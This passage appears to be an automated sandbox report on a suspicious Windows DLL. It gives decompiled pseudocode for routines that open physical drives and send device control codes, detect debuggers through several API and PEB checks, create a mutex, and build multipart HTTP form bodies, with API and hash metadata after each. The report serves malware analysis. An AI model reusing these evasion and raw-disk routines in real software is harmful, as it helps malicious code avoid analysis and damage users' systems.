                                                                                                                                                                    				return _v1584;
                                                                                                                                                                    			}
































                                                                                                                                                                    APIs
                                                                                                                                                                    • wsprintfW.USER32 ref: 1001D3AA
                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D3C9
                                                                                                                                                                    • DeviceIoControl.KERNEL32 ref: 1001D442
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ControlCreateDeviceFilewsprintf
                                                                                                                                                                    • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                    • API String ID: 3081802084-2935326385
                                                                                                                                                                    • Opcode ID: 2fadef59205d778281ae9fe9edf870ac3f4638ab99f78137041e2ce31b984e5b
                                                                                                                                                                    • Instruction ID: c19dd4f4148ea860b5569224362e113c716c363f4a93641ea984967bd2cc70da
                                                                                                                                                                    • Opcode Fuzzy Hash: 2fadef59205d778281ae9fe9edf870ac3f4638ab99f78137041e2ce31b984e5b
                                                                                                                                                                    • Instruction Fuzzy Hash: E9513EB4D00318ABEB10DF94DC95BDEB7B5EB84304F108198E509AB280D7B6AA94CF95
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                    			E1000EFFC(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                    				intOrPtr _v0;
                                                                                                                                                                    				void* _v804;
                                                                                                                                                                    				intOrPtr _v808;
                                                                                                                                                                    				intOrPtr _v812;
                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                    				long _t17;
                                                                                                                                                                    				intOrPtr _t21;
                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                    				intOrPtr* _t31;
                                                                                                                                                                    				void* _t34;
                                                                                                                                                                    
                                                                                                                                                                    				_t27 = __esi;
                                                                                                                                                                    				_t26 = __edi;
                                                                                                                                                                    				_t25 = __edx;
                                                                                                                                                                    				_t22 = __ecx;
                                                                                                                                                                    				_t21 = __ebx;
                                                                                                                                                                    				_t6 = __eax;
                                                                                                                                                                    				_t34 = _t22 -  *0x103322d8; // 0xabce99ef
                                                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                                                    					asm("repe ret");
                                                                                                                                                                    				}
                                                                                                                                                                    				 *0x10333a58 = _t6;
                                                                                                                                                                    				 *0x10333a54 = _t22;
                                                                                                                                                                    				 *0x10333a50 = _t25;
                                                                                                                                                                    				 *0x10333a4c = _t21;
                                                                                                                                                                    				 *0x10333a48 = _t27;
                                                                                                                                                                    				 *0x10333a44 = _t26;
                                                                                                                                                                    				 *0x10333a70 = ss;
                                                                                                                                                                    				 *0x10333a64 = cs;
                                                                                                                                                                    				 *0x10333a40 = ds;
                                                                                                                                                                    				 *0x10333a3c = es;
                                                                                                                                                                    				 *0x10333a38 = fs;
                                                                                                                                                                    				 *0x10333a34 = gs;
                                                                                                                                                                    				asm("pushfd");
                                                                                                                                                                    				_pop( *0x10333a68);
                                                                                                                                                                    				 *0x10333a5c =  *_t31;
                                                                                                                                                                    				 *0x10333a60 = _v0;
                                                                                                                                                                    				 *0x10333a6c =  &_a4;
                                                                                                                                                                    				 *0x103339a8 = 0x10001;
                                                                                                                                                                    				_t11 =  *0x10333a60; // 0x0
                                                                                                                                                                    				 *0x1033395c = _t11;
                                                                                                                                                                    				 *0x10333950 = 0xc0000409;
                                                                                                                                                                    				 *0x10333954 = 1;
                                                                                                                                                                    				_t12 =  *0x103322d8; // 0xabce99ef
                                                                                                                                                                    				_v812 = _t12;
                                                                                                                                                                    				_t13 =  *0x103322dc; // 0x54316610
                                                                                                                                                                    				_v808 = _t13;
                                                                                                                                                                    				 *0x103339a0 = IsDebuggerPresent();
                                                                                                                                                                    				_push(1);
                                                                                                                                                                    				E10013A5E(_t14);
                                                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                                                    				_t17 = UnhandledExceptionFilter(0x10023b34);
                                                                                                                                                                    				if( *0x103339a0 == 0) {
                                                                                                                                                                    					_push(1);
                                                                                                                                                                    					E10013A5E(_t17);
                                                                                                                                                                    				}
                                                                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 100161C5
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100161DA
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(10023B34), ref: 100161E5
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 10016201
                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 10016208
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                    • Opcode ID: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                                    • Instruction ID: 7a4982afc0af0121ee83e1bbc930dedb521e4c826244c77e9c1cc9287b5788a2
                                                                                                                                                                    • Opcode Fuzzy Hash: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                                    • Instruction Fuzzy Hash: 0A21CCB4901264EFE700DF29DCC86447BA8FB88311F50D11AE98D8AB62E7B499C5CF02
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001A0F0(CHAR* _a4) {
                                                                                                                                                                    				struct _SECURITY_DESCRIPTOR _v24;
                                                                                                                                                                    				void* _v28;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES _v40;
                                                                                                                                                                    				int _v44;
                                                                                                                                                                    
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                    				InitializeSecurityDescriptor( &_v24, 1);
                                                                                                                                                                    				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
                                                                                                                                                                    				_v40.nLength = 0xc;
                                                                                                                                                                    				_v40.bInheritHandle = 1;
                                                                                                                                                                    				_v40.lpSecurityDescriptor =  &_v24;
                                                                                                                                                                    				_v28 = CreateMutexA( &_v40, 0, _a4);
                                                                                                                                                                    				if(_v28 != 0 && GetLastError() == 0xb7) {
                                                                                                                                                                    					_v44 = 1;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _v44;
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A10A
                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A11A
                                                                                                                                                                    • CreateMutexA.KERNEL32(0000000C,00000000,10020584), ref: 1001A13E
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1001A14D
Memory Dump Source
• Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
• Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
• Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
• Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
• Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                    			E10019FF0(void* __ecx) {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    
                                                                                                                                                                    				__imp__CheckRemoteDebuggerPresent(GetCurrentProcess(),  &_v8, __ecx);
                                                                                                                                                                    				return _v8;
                                                                                                                                                                    			}





                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000001,?,?,1001A032,?,?,1001A0C0), ref: 10019FF8
                                                                                                                                                                    • CheckRemoteDebuggerPresent.KERNEL32(00000000,?,?,1001A032,?,?,1001A0C0), ref: 10019FFF
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CheckCurrentDebuggerPresentProcessRemote
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E10019E10() {
                                                                                                                                                                    				long _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    
                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                    				_v8 = GetVersion();
                                                                                                                                                                    				_v12 = _v8 & 0xff;
                                                                                                                                                                    				if(_v12 != 5) {
                                                                                                                                                                    					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x40));
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0xc));
                                                                                                                                                                    				}
                                                                                                                                                                    				return 0 | _v16 != 0x00000002;
                                                                                                                                                                    			}







                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Version
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E10019E70() {
                                                                                                                                                                    				long _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    
                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                    				_v8 = GetVersion();
                                                                                                                                                                    				_v12 = _v8 & 0xff;
                                                                                                                                                                    				if(_v12 != 5) {
                                                                                                                                                                    					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x44));
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x10));
                                                                                                                                                                    				}
                                                                                                                                                                    				return 0 | _v16 != 0x00000000;
                                                                                                                                                                    			}







                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Version
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001A010() {
                                                                                                                                                                    
                                                                                                                                                                    				return IsDebuggerPresent();
                                                                                                                                                                    			}




                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,1001A029,?,?,1001A0C0), ref: 1001A013
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DebuggerPresent
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1347740429-0
                                                                                                                                                                    • Opcode ID: 612a82e7f905e4fadff19306b7dac36e1d559707925f7834b75f507085b4ae3e
                                                                                                                                                                    • Instruction ID: c4092c56797faab5bd9b61a6cf6905532769cb289c64f9062f49348239aa7e77
                                                                                                                                                                    • Opcode Fuzzy Hash: 612a82e7f905e4fadff19306b7dac36e1d559707925f7834b75f507085b4ae3e
                                                                                                                                                                    • Instruction Fuzzy Hash: D590023104461C8B964027A5689DB55775CA5449157944051E50D415129A55642145A5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%


                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                    			E10021460(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				char* _v20;
                                                                                                                                                                    				char _v24;
                                                                                                                                                                    				char _v28;
                                                                                                                                                                    				char _v543;
                                                                                                                                                                    				char _v544;
                                                                                                                                                                    				char _v807;
                                                                                                                                                                    				char _v808;
                                                                                                                                                                    				char* _v812;
                                                                                                                                                                    				char _v1079;
                                                                                                                                                                    				char _v1080;
                                                                                                                                                                    				char* _v1084;
                                                                                                                                                                    				char* _v1088;
                                                                                                                                                                    				char _v1599;
                                                                                                                                                                    				char _v1600;
                                                                                                                                                                    				intOrPtr _v1604;
                                                                                                                                                                    				char _v15703;
                                                                                                                                                                    				char _v15704;
                                                                                                                                                                    				char* _v15708;
                                                                                                                                                                    				char _v29807;
                                                                                                                                                                    				char _v29808;
                                                                                                                                                                    				char* _v29812;
                                                                                                                                                                    				char _v43911;
                                                                                                                                                                    				char _v43912;
                                                                                                                                                                    				char _v58007;
                                                                                                                                                                    				char _v58008;
                                                                                                                                                                    				char _v58024;
                                                                                                                                                                    				char _v58052;
                                                                                                                                                                    				char _v58080;
                                                                                                                                                                    				char _v58084;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t172;
                                                                                                                                                                    				intOrPtr _t179;
                                                                                                                                                                    				void* _t186;
                                                                                                                                                                    				void* _t195;
                                                                                                                                                                    				void* _t216;
                                                                                                                                                                    				void* _t218;
                                                                                                                                                                    				void* _t237;
                                                                                                                                                                    				void* _t254;
                                                                                                                                                                    				intOrPtr _t297;
                                                                                                                                                                    				intOrPtr _t357;
                                                                                                                                                                    				void* _t359;
                                                                                                                                                                    				void* _t366;
                                                                                                                                                                    				void* _t376;
                                                                                                                                                                    				void* _t385;
                                                                                                                                                                    				void* _t392;
                                                                                                                                                                    
                                                                                                                                                                    				_t353 = __edi;
                                                                                                                                                                    				_t265 = __ebx;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(E10022B1C);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				 *[fs:0x0] = _t357;
                                                                                                                                                                    				E10018AA0(0xe2d4);
                                                                                                                                                                    				_push(_t354);
                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                    				_v28 = "--";
                                                                                                                                                                    				if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
                                                                                                                                                                    					_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
                                                                                                                                                                    					_v1084 = "Content-Type: %s";
                                                                                                                                                                    					_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
                                                                                                                                                                    					_v808 = 0;
                                                                                                                                                                    					E1000CF20(__edi,  &_v807, 0, 0x103);
                                                                                                                                                                    					_v1080 = 0;
                                                                                                                                                                    					E1000CF20(_t353,  &_v1079, 0, 0x103);
                                                                                                                                                                    					_v1600 = 0;
                                                                                                                                                                    					E1000CF20(_t353,  &_v1599, 0, 0x1ff);
                                                                                                                                                                    					_push(_a20);
                                                                                                                                                                    					_push(_a16);
                                                                                                                                                                    					E1000CC93(_t353,  &_v808, _v812, _a16);
                                                                                                                                                                    					E1000CC93(_t353,  &_v1080, _v1084, _a24);
                                                                                                                                                                    					_push( &_v1080);
                                                                                                                                                                    					_push( &_v808);
                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                    					E1000CC93(_t353,  &_v1600, _v1088, _v28);
                                                                                                                                                                    					_t392 = _t357 + 0x5c;
                                                                                                                                                                    					if( *_a36 != 0) {
                                                                                                                                                                    						E1000D190(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAC0( &_v1600));
                                                                                                                                                                    						_t392 = _t392 + 0x10;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t254 = E1000CAC0( &_v1600);
                                                                                                                                                                    					_t357 = _t392 + 4;
                                                                                                                                                                    					_v24 = _t254 + _v24;
                                                                                                                                                                    					if( *_a36 != 0) {
                                                                                                                                                                    						E1000D190(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
                                                                                                                                                                    						_t357 = _t357 + 0xc;
                                                                                                                                                                    					}
                                                                                                                                                                    					_v24 = _v24 + _a32;
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_a8 != 0 && _a12 > 0) {
                                                                                                                                                                    					_t172 = E10001A50(_a8, "=");
                                                                                                                                                                    					_t357 = _t357 + 8;
                                                                                                                                                                    					if(_t172 != 0) {
                                                                                                                                                                    						_v15708 = "Content-Disposition: form-data; name=\"%s\"";
                                                                                                                                                                    						_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
                                                                                                                                                                    						_v58008 = 0;
                                                                                                                                                                    						E1000CF20(_t353,  &_v58007, 0, 0x370f);
                                                                                                                                                                    						_v29808 = 0;
                                                                                                                                                                    						E1000CF20(_t353,  &_v29807, 0, 0x370f);
                                                                                                                                                                    						_v43912 = 0;
                                                                                                                                                                    						E1000CF20(_t353,  &_v43911, 0, 0x370f);
                                                                                                                                                                    						_v15704 = 0;
                                                                                                                                                                    						E1000CF20(_t353,  &_v15703, 0, 0x370f);
                                                                                                                                                                    						_t179 = E10001A50(_a8, "&");
                                                                                                                                                                    						_t366 = _t357 + 0x38;
                                                                                                                                                                    						_v1604 = _t179;
                                                                                                                                                                    						if(_v1604 != 0) {
                                                                                                                                                                    							E10001160( &_v58052, __eflags, _a8);
                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                    							E10002FE0( &_v58024, __eflags);
                                                                                                                                                                    							_v8 = 1;
                                                                                                                                                                    							E10001160( &_v58080, __eflags, "&");
                                                                                                                                                                    							_v8 = 2;
                                                                                                                                                                    							E1001A850(__eflags,  &_v58052,  &_v58024,  &_v58080);
                                                                                                                                                                    							_t357 = _t366 + 0xc;
                                                                                                                                                                    							_v58084 = 0;
                                                                                                                                                                    							while(1) {
                                                                                                                                                                    								_t186 = E100021E0( &_v58024);
                                                                                                                                                                    								__eflags = _v58084 - _t186;
                                                                                                                                                                    								if(_v58084 >= _t186) {
                                                                                                                                                                    									break;
                                                                                                                                                                    								}
                                                                                                                                                                    								E1000CF20(_t353,  &_v43912, 0, 0x3710);
                                                                                                                                                                    								E1000CF20(_t353,  &_v15704, 0, 0x3710);
                                                                                                                                                                    								_t195 = E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=");
                                                                                                                                                                    								_t354 = _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084));
                                                                                                                                                                    								E1000D190(_t265, _t353, _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E10003030( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)));
                                                                                                                                                                    								E1000D8A3(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=") + 1);
                                                                                                                                                                    								E1000CF20(_t353,  &_v58008, 0, 0x3710);
                                                                                                                                                                    								E1000CF20(_t353,  &_v29808, 0, 0x3710);
                                                                                                                                                                    								E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
                                                                                                                                                                    								_push( &_v15704);
                                                                                                                                                                    								_push( &_v58008);
                                                                                                                                                                    								_push(_a4);
                                                                                                                                                                    								E1000CC93(_t353,  &_v29808, _v29812, _v28);
                                                                                                                                                                    								_t376 = _t357 + 0x7c;
                                                                                                                                                                    								__eflags =  *_a36;
                                                                                                                                                                    								if( *_a36 != 0) {
                                                                                                                                                                    									_t218 = E1000CAC0( &_v29808);
                                                                                                                                                                    									__eflags =  *_a36 + _v24;
                                                                                                                                                                    									E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
                                                                                                                                                                    									_t376 = _t376 + 0x10;
                                                                                                                                                                    								}
                                                                                                                                                                    								_t216 = E1000CAC0( &_v29808);
                                                                                                                                                                    								_t357 = _t376 + 4;
                                                                                                                                                                    								_v24 = _t216 + _v24;
                                                                                                                                                                    								_t297 = _v58084 + 1;
                                                                                                                                                                    								__eflags = _t297;
                                                                                                                                                                    								_v58084 = _t297;
                                                                                                                                                                    							}
                                                                                                                                                                    							_v8 = 1;
                                                                                                                                                                    							E100011A0( &_v58080);
                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                    							E10003010( &_v58024);
                                                                                                                                                                    							_v8 = 0xffffffff;
                                                                                                                                                                    							E100011A0( &_v58052);
                                                                                                                                                                    						} else {
                                                                                                                                                                    							E1000D190(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
                                                                                                                                                                    							E1000D8A3(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
                                                                                                                                                                    							E1000CF20(_t353,  &_v58008, 0, 0x3710);
                                                                                                                                                                    							E1000CF20(_t353,  &_v29808, 0, 0x3710);
                                                                                                                                                                    							E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
                                                                                                                                                                    							_push( &_v15704);
                                                                                                                                                                    							_push( &_v58008);
                                                                                                                                                                    							_push(_a4);
                                                                                                                                                                    							E1000CC93(_t353,  &_v29808, _v29812, _v28);
                                                                                                                                                                    							_t385 = _t366 + 0x64;
                                                                                                                                                                    							if( *_a36 != 0) {
                                                                                                                                                                    								E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAC0( &_v29808));
                                                                                                                                                                    								_t385 = _t385 + 0x10;
                                                                                                                                                                    							}
                                                                                                                                                                    							_t237 = E1000CAC0( &_v29808);
                                                                                                                                                                    							_t357 = _t385 + 4;
                                                                                                                                                                    							_v24 = _t237 + _v24;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_v20 = "\r\n%s%s%s\r\n";
                                                                                                                                                                    				_v544 = 0;
                                                                                                                                                                    				E1000CF20(_t353,  &_v543, 0, 0x1ff);
                                                                                                                                                                    				_push(_v28);
                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                    				E1000CC93(_t353,  &_v544, _v20, _v28);
                                                                                                                                                                    				_t359 = _t357 + 0x20;
                                                                                                                                                                    				if( *_a36 != 0) {
                                                                                                                                                                    					E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAC0( &_v544));
                                                                                                                                                                    					_t359 = _t359 + 0x10;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v24 = E1000CAC0( &_v544) + _v24;
                                                                                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                                                                                    				return _v24;
                                                                                                                                                                    			}


















































                                                                                                                                                                    0x10021a22
                                                                                                                                                                    0x10021a27
                                                                                                                                                                    0x10021a31
                                                                                                                                                                    0x10021a36
                                                                                                                                                                    0x10021a43
                                                                                                                                                                    0x100216e8
                                                                                                                                                                    0x10021708
                                                                                                                                                                    0x10021731
                                                                                                                                                                    0x10021747
                                                                                                                                                                    0x1002175d
                                                                                                                                                                    0x1002177a
                                                                                                                                                                    0x10021788
                                                                                                                                                                    0x1002178f
                                                                                                                                                                    0x10021793
                                                                                                                                                                    0x100217a6
                                                                                                                                                                    0x100217ab
                                                                                                                                                                    0x100217b4
                                                                                                                                                                    0x100217d6
                                                                                                                                                                    0x100217db
                                                                                                                                                                    0x100217db
                                                                                                                                                                    0x100217e5
                                                                                                                                                                    0x100217ea
                                                                                                                                                                    0x100217f0
                                                                                                                                                                    0x100217f0
                                                                                                                                                                    0x100216e2
                                                                                                                                                                    0x10021636
                                                                                                                                                                    0x10021a48
                                                                                                                                                                    0x10021a4f
                                                                                                                                                                    0x10021a64
                                                                                                                                                                    0x10021a6f
                                                                                                                                                                    0x10021a73
                                                                                                                                                                    0x10021a83
                                                                                                                                                                    0x10021a88
                                                                                                                                                                    0x10021a91
                                                                                                                                                                    0x10021ab3
                                                                                                                                                                    0x10021ab8
                                                                                                                                                                    0x10021ab8
                                                                                                                                                                    0x10021acd
                                                                                                                                                                    0x10021ad6
                                                                                                                                                                    0x10021ae1

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 854390245-0
                                                                                                                                                                    • Opcode ID: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                                    • Instruction ID: 2d82e108429a1e59b14db5b6321f6623d8f234d0aa847db4e2dbab4e051ccd9c
                                                                                                                                                                    • Opcode Fuzzy Hash: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                                    • Instruction Fuzzy Hash: BC0290B6D00218ABDB10DB90DC82FDE777DEB58340F4445A8F509A7285EB74AB44CFA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                    			E100133E0(void* __ebx) {
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				_Unknown_base(*)()* _t7;
                                                                                                                                                                    				long _t10;
                                                                                                                                                                    				void* _t11;
                                                                                                                                                                    				int _t12;
                                                                                                                                                                    				void* _t18;
                                                                                                                                                                    				intOrPtr _t21;
                                                                                                                                                                    				long _t26;
                                                                                                                                                                    				void* _t30;
                                                                                                                                                                    				struct HINSTANCE__* _t37;
                                                                                                                                                                    				void* _t40;
                                                                                                                                                                    				void* _t42;
                                                                                                                                                                    
                                                                                                                                                                    				_t30 = __ebx;
                                                                                                                                                                    				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                                                                    				if(_t37 != 0) {
                                                                                                                                                                    					 *0x10333818 = GetProcAddress(_t37, "FlsAlloc");
                                                                                                                                                                    					 *0x1033381c = GetProcAddress(_t37, "FlsGetValue");
                                                                                                                                                                    					 *0x10333820 = GetProcAddress(_t37, "FlsSetValue");
                                                                                                                                                                    					_t7 = GetProcAddress(_t37, "FlsFree");
                                                                                                                                                                    					__eflags =  *0x10333818;
                                                                                                                                                                    					_t40 = TlsSetValue;
                                                                                                                                                                    					 *0x10333824 = _t7;
                                                                                                                                                                    					if( *0x10333818 == 0) {
                                                                                                                                                                    						L6:
                                                                                                                                                                    						 *0x1033381c = TlsGetValue;
                                                                                                                                                                    						 *0x10333818 = E10013097;
                                                                                                                                                                    						 *0x10333820 = _t40;
                                                                                                                                                                    						 *0x10333824 = TlsFree;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						__eflags =  *0x1033381c;
                                                                                                                                                                    						if( *0x1033381c == 0) {
                                                                                                                                                                    							goto L6;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							__eflags =  *0x10333820;
                                                                                                                                                                    							if( *0x10333820 == 0) {
                                                                                                                                                                    								goto L6;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								__eflags = _t7;
                                                                                                                                                                    								if(_t7 == 0) {
                                                                                                                                                                    									goto L6;
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					_t10 = TlsAlloc();
                                                                                                                                                                    					__eflags = _t10 - 0xffffffff;
                                                                                                                                                                    					 *0x10332c6c = _t10;
                                                                                                                                                                    					if(_t10 == 0xffffffff) {
                                                                                                                                                                    						L15:
                                                                                                                                                                    						_t11 = 0;
                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t12 = TlsSetValue(_t10,  *0x1033381c);
